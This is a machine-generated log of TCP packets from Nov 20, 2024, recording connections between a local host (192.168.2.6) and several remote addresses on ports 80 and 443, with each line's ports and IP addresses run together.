                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143636942 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143656969 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143722057 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143835068 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143879890 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143965006 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.144032955 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.144056082 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.144071102 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.144112110 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.147011042 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.147028923 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.147571087 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.147608042 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.147763014 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.149570942 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.149581909 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.149792910 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.150095940 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.150151968 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.150285006 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.150305033 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.151563883 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.151582003 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.152955055 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.152966976 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.153021097 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.153027058 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.156465054 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.156481028 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.156543016 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.156699896 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.156708956 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159172058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159257889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159306049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159341097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159357071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159367085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159373045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159389019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159404039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159415960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159415960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159420013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159451008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159476042 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159490108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159490108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159492016 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159513950 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159518003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159543991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159558058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159574986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159578085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159578085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159590960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159606934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159614086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159625053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159641027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159645081 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159658909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159677982 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159688950 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159702063 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159702063 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159722090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159734964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159749985 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159753084 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159770012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159785032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159789085 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159801006 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159815073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159816980 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159831047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159848928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159877062 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159879923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159897089 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159912109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159924030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159928083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159940958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159943104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159960032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159975052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159975052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.159976959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160001993 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160017967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160027027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160032988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160062075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160063028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160063028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160079956 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160098076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160113096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160128117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160130024 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160130024 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160142899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160160065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160165071 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160196066 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160206079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160228968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160240889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160240889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160259962 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160399914 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160520077 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160625935 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160660028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160746098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160945892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.160984993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161067963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161086082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161130905 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161542892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161560059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161616087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161616087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161680937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161700010 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161715984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161734104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161735058 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161735058 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161772966 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161772966 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161859989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161876917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161915064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.161915064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162009001 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162025928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162040949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162065983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162118912 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162158012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162174940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162190914 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162203074 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162206888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162228107 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162239075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162292004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162308931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162324905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162333012 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162341118 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162368059 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162368059 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162450075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162523031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162539005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.162589073 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.167335033 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.176806927 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.177155972 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.177166939 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.178360939 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.178426027 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.179019928 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.179090023 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.179325104 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.179328918 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.179337978 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.184355021 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.184573889 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.184595108 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.185775042 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.185853004 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.186846018 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.187048912 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.187167883 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.187252045 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.187267065 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.187474012 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.187489033 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.188306093 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.188364029 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.188674927 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.188736916 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.188811064 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211119890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211133957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211149931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211215019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211241961 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211271048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211287022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211302996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211327076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211328030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211344957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211368084 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211401939 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211430073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211442947 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211457968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211473942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211473942 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211489916 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211505890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211520910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211524010 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211524010 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211544037 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211582899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211597919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211613894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211617947 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211630106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211654902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211659908 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211659908 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211700916 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211700916 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211739063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211755991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211771965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211786032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211805105 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211848974 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211949110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211963892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211981058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.211994886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212003946 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212021112 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212054968 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212107897 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212125063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212140083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212155104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212169886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212172985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212187052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212188959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212209940 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212229013 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212260008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212276936 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212291002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212306023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212316990 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212321043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212337971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212347031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212347031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212414980 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212435007 CET8049910185.215.113.206192.168.2.6
